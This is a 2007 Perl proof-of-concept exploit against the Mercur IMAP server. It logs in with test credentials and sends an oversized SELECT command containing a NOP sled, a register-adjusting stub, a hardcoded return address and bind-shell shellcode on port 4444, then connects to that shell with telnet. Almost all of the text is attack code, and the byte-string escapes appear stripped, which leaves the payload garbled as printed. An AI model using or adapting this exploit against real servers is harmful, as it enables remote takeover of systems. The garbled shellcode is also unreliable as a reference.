mercur-imap.txt
Posted on 16 January 2007
#!/bin/perl # tested on win2k server SP4 English # ATTENTION! If you have an another valid account you must change the offsets this is only a poc # use IO::Socket::INET; my $host = shift(@ARGV); my $port = 143; my $reply; my $request; my $user = "test"; my $pass = "test"; my $nop = "x90"x8; my $nop1 = "x90"x20; my $ret = "x42xb2xc1x40"; #my $ret = "x42x42x42x42"; #call edi in mcrimap4.exe my $asm="x8bxc7x83xc0x23x50xc3"; # asm is a binary translation of these assembly instructions;eax now have the correct memory address for shellcode # # 8BC7 MOV EAX,EDI # 83C0 23 ADD EAX,23 # 50 PUSH EAX # C3 RETN #A binary translation of NGS Writing Small Shellcode by Dafydd Stuttard with only two little differences #1)bind port, in this exploit is 4444 in the original shellcode was 6666 #2)4 bytes added to the shellcode in order not to see the window of cmd.exe on remote host my $shellcode = "x59x81xc9xd3x62x30x20x41x43x4dx64". "x64x99x96x8Dx7ExE8x64x8Bx5Ax30x8Bx4Bx0Cx8Bx49x1C". "x8Bx09x8Bx69x08xB6x03x2BxE2x66xBAx33x32x52x68x77". "x73x32x5Fx54xACx3CxD3x75x06x95xFFx57xF4x95x57x60". "x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59x20x03xDDx33xFF". "x47x8Bx34xBBx03xF5x99xACx34x71x2AxD0x3Cx71x75xF7". "x3Ax54x24x1Cx75xEAx8Bx59x24x03xDDx66x8Bx3Cx7Bx8B". "x59x1Cx03xDDx03x2CxBBx95x5FxABx57x61x3BxF7x75xB4". "x5Ex54x6Ax02xADxFFxD0x88x46x13x8Dx48x30x8BxFCxF3". "xABx40x50x40x50xADxFFxD0x95xB8x02xFFx11x5cx32xE4". "x50x54x55xADxFFxD0x85xC0x74xF8xFEx44x24x2DxFEx44". "x24x2cx83xEFx6CxABxABxABx58x54x54x50x50x50x54x50". "x50x56x50xFFx56xE4xFFx56xE8"; my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port); $socket or die "Cannot connect to host! "; recv($socket, $reply, 1024, 0); print "Response:" . $reply; $request = "a001 LOGIN $user $pass "; send $socket, $request, 0; print "[+] Sent login "; recv($socket, $reply, 1024, 0); print "Response:" . $reply; $request = " SELECT " . $nop . $asm . $nop1 . $shellcode . $ret ." "; send $socket, $request, 0; print "[+] Sent chunk "; print " + Connect on port 4444 of $host ... "; system("telnet $host 4444"); close $socket; exit;
